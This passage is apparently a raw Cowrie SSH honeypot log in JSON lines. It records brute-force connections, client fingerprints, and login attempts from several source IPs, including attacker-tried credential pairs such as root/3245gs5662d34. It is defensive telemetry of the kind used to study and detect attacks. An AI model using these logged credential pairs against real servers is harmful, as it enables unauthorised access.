2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:09:26.058278Z","src_ip":"212.227.125.160","session":"ce3f9c301cf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36456,"dst_ip":"1.2.3.4","dst_port":22,"session":"89a3563f3108","protocol":"ssh","message":"New connection: 212.227.235.229:36456 (1.2.3.4:22) [session: 89a3563f3108]","sensor":"my-vps","timestamp":"2025-08-31T06:09:26.257261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:26.258204Z","src_ip":"212.227.235.229","session":"89a3563f3108"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:26.465239Z","src_ip":"212.227.235.229","session":"89a3563f3108"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:09:26.986780Z","src_ip":"212.227.235.229","session":"4bd566471ef5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:27.270061Z","src_ip":"212.227.235.229","session":"4bd566471ef5"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:27.271060Z","src_ip":"212.227.235.229","session":"f7fa26620e15"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:09:27.334716Z","src_ip":"212.227.235.229","session":"89a3563f3108"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:27.544268Z","src_ip":"212.227.235.229","session":"c31ffdb1afd4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:27.545102Z","src_ip":"212.227.235.229","session":"89a3563f3108"}
{"eventid":"cowrie.login.failed","username":"test4","password":"12345","message":"login attempt [test4/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:09:28.904469Z","src_ip":"212.227.125.160","session":"ce3f9c301cf1"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:30.393164Z","src_ip":"212.227.125.160","session":"ce3f9c301cf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53474,"dst_ip":"1.2.3.4","dst_port":22,"session":"d809945ac88d","protocol":"ssh","message":"New connection: 212.227.125.160:53474 (1.2.3.4:22) [session: d809945ac88d]","sensor":"my-vps","timestamp":"2025-08-31T06:09:32.301420Z"}
{"eventid":"cowrie.session.closed","duration":"80.6","message":"Connection lost after 80.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:42.968471Z","src_ip":"212.227.125.160","session":"ed593f47425a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36744,"dst_ip":"1.2.3.4","dst_port":22,"session":"93b234094cc9","protocol":"ssh","message":"New connection: 212.227.235.229:36744 (1.2.3.4:22) [session: 93b234094cc9]","sensor":"my-vps","timestamp":"2025-08-31T06:09:48.573429Z"}
{"eventid":"cowrie.session.closed","duration":"20.0","message":"Connection lost after 20.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:52.292622Z","src_ip":"212.227.125.160","session":"d809945ac88d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40763,"dst_ip":"1.2.3.4","dst_port":22,"session":"47ce23009d90","protocol":"ssh","message":"New connection: 212.227.235.229:40763 (1.2.3.4:22) [session: 47ce23009d90]","sensor":"my-vps","timestamp":"2025-08-31T06:09:58.837024Z"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-31T06:10:01.136838Z","src_ip":"212.227.235.229","session":"3ce8d6413c3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39088,"dst_ip":"1.2.3.4","dst_port":22,"session":"96e183a8fe47","protocol":"ssh","message":"New connection: 212.227.235.229:39088 (1.2.3.4:22) [session: 96e183a8fe47]","sensor":"my-vps","timestamp":"2025-08-31T06:10:02.433856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:10:03.091470Z","src_ip":"212.227.235.229","session":"96e183a8fe47"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:10:03.092299Z","src_ip":"212.227.235.229","session":"96e183a8fe47"}
{"eventid":"cowrie.login.failed","username":"test4","password":"1234567","message":"login attempt [test4/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T06:10:08.504425Z","src_ip":"212.227.235.229","session":"96e183a8fe47"}
{"eventid":"cowrie.session.closed","duration":"21.2","message":"Connection lost after 21.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:09.807629Z","src_ip":"212.227.235.229","session":"93b234094cc9"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:10.444702Z","src_ip":"212.227.235.229","session":"96e183a8fe47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37008,"dst_ip":"1.2.3.4","dst_port":22,"session":"15828ef8c232","protocol":"ssh","message":"New connection: 212.227.235.229:37008 (1.2.3.4:22) [session: 15828ef8c232]","sensor":"my-vps","timestamp":"2025-08-31T06:10:19.299812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:10:19.300736Z","src_ip":"212.227.235.229","session":"15828ef8c232"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:10:19.572233Z","src_ip":"212.227.235.229","session":"15828ef8c232"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1qaz2WSX","message":"login attempt [ubuntu/1qaz2WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T06:10:20.700760Z","src_ip":"212.227.235.229","session":"15828ef8c232"}
{"eventid":"cowrie.session.closed","duration":"99.7","message":"Connection lost after 99.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:21.647815Z","src_ip":"212.227.235.229","session":"3ce8d6413c3a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:21.974155Z","src_ip":"212.227.235.229","session":"15828ef8c232"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58034,"dst_ip":"1.2.3.4","dst_port":22,"session":"54106ea2afe9","protocol":"ssh","message":"New connection: 212.227.125.160:58034 (1.2.3.4:22) [session: 54106ea2afe9]","sensor":"my-vps","timestamp":"2025-08-31T06:10:22.282820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:10:22.953043Z","src_ip":"212.227.125.160","session":"54106ea2afe9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:10:22.953836Z","src_ip":"212.227.125.160","session":"54106ea2afe9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51600,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9e03dedcf10","protocol":"ssh","message":"New connection: 212.227.235.229:51600 (1.2.3.4:22) [session: b9e03dedcf10]","sensor":"my-vps","timestamp":"2025-08-31T06:10:23.423513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:10:23.424591Z","src_ip":"212.227.235.229","session":"b9e03dedcf10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:10:23.747018Z","src_ip":"212.227.235.229","session":"b9e03dedcf10"}
{"eventid":"cowrie.login.failed","username":"test4","password":"1234567","message":"login attempt [test4/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T06:10:24.971713Z","src_ip":"212.227.125.160","session":"54106ea2afe9"}
{"eventid":"cowrie.login.failed","username":"peertube","password":"12345678","message":"login attempt [peertube/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:10:25.079544Z","src_ip":"212.227.235.229","session":"b9e03dedcf10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41938,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a802840bf53","protocol":"ssh","message":"New connection: 212.227.235.229:41938 (1.2.3.4:22) [session: 1a802840bf53]","sensor":"my-vps","timestamp":"2025-08-31T06:10:25.687258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:10:25.688415Z","src_ip":"212.227.235.229","session":"1a802840bf53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:10:25.973557Z","src_ip":"212.227.235.229","session":"1a802840bf53"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:26.403873Z","src_ip":"212.227.235.229","session":"b9e03dedcf10"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:26.458256Z","src_ip":"212.227.125.160","session":"54106ea2afe9"}
{"eventid":"cowrie.login.failed","username":"root1","password":"12345","message":"login attempt [root1/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:10:27.155603Z","src_ip":"212.227.235.229","session":"1a802840bf53"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55548,"dst_ip":"1.2.3.4","dst_port":22,"session":"28d12abb07ee","protocol":"ssh","message":"New connection: 217.72.205.35:55548 (1.2.3.4:22) [session: 28d12abb07ee]","sensor":"my-vps","timestamp":"2025-08-31T06:10:27.547009Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:27.549149Z","src_ip":"217.72.205.35","session":"28d12abb07ee"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:28.443279Z","src_ip":"212.227.235.229","session":"1a802840bf53"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.220","src_port":64452,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa801eb9ca7b","protocol":"ssh","message":"New connection: 192.155.90.220:64452 (1.2.3.4:22) [session: aa801eb9ca7b]","sensor":"my-vps","timestamp":"2025-08-31T06:10:32.283321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:10:32.440525Z","src_ip":"192.155.90.220","session":"aa801eb9ca7b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T06:10:32.441327Z","src_ip":"192.155.90.220","session":"aa801eb9ca7b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:32.993633Z","src_ip":"192.155.90.220","session":"aa801eb9ca7b"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.220","src_port":64464,"dst_ip":"1.2.3.4","dst_port":22,"session":"c50eee84c25c","protocol":"ssh","message":"New connection: 192.155.90.220:64464 (1.2.3.4:22) [session: c50eee84c25c]","sensor":"my-vps","timestamp":"2025-08-31T06:10:33.093247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:10:33.319628Z","src_ip":"192.155.90.220","session":"c50eee84c25c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T06:10:33.320374Z","src_ip":"192.155.90.220","session":"c50eee84c25c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:10:33.853801Z","src_ip":"192.155.90.220","session":"c50eee84c25c"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.220","src_port":64470,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e998048db1c","protocol":"ssh","message":"New connection: 192.155.90.220:64470 (1.2.3.4:22) [session: 2e998048db1c]","sensor":"my-vps","timestamp":"2025-08-31T06:10:33.949638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:10:34.204889Z","src_ip":"192.155.90.220","session":"2e998048db1c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T06:10:34.205659Z","src_ip":"192.155.90.220","session":"2e998048db1c"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":57740,"dst_ip":"1.2.3.4","dst_port":22,"session":"8162acb32a6d","protocol":"ssh","message":"New connection: 43.159.36.188:57740 (1.2.3.4:22) [session: 8162acb32a6d]","sensor":"my-vps","timestamp":"2025-08-31T06:10:34.304568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:10:34.305598Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:10:34.547840Z","src_ip":"43.159.36.188","session":"8162acb32a6d"}
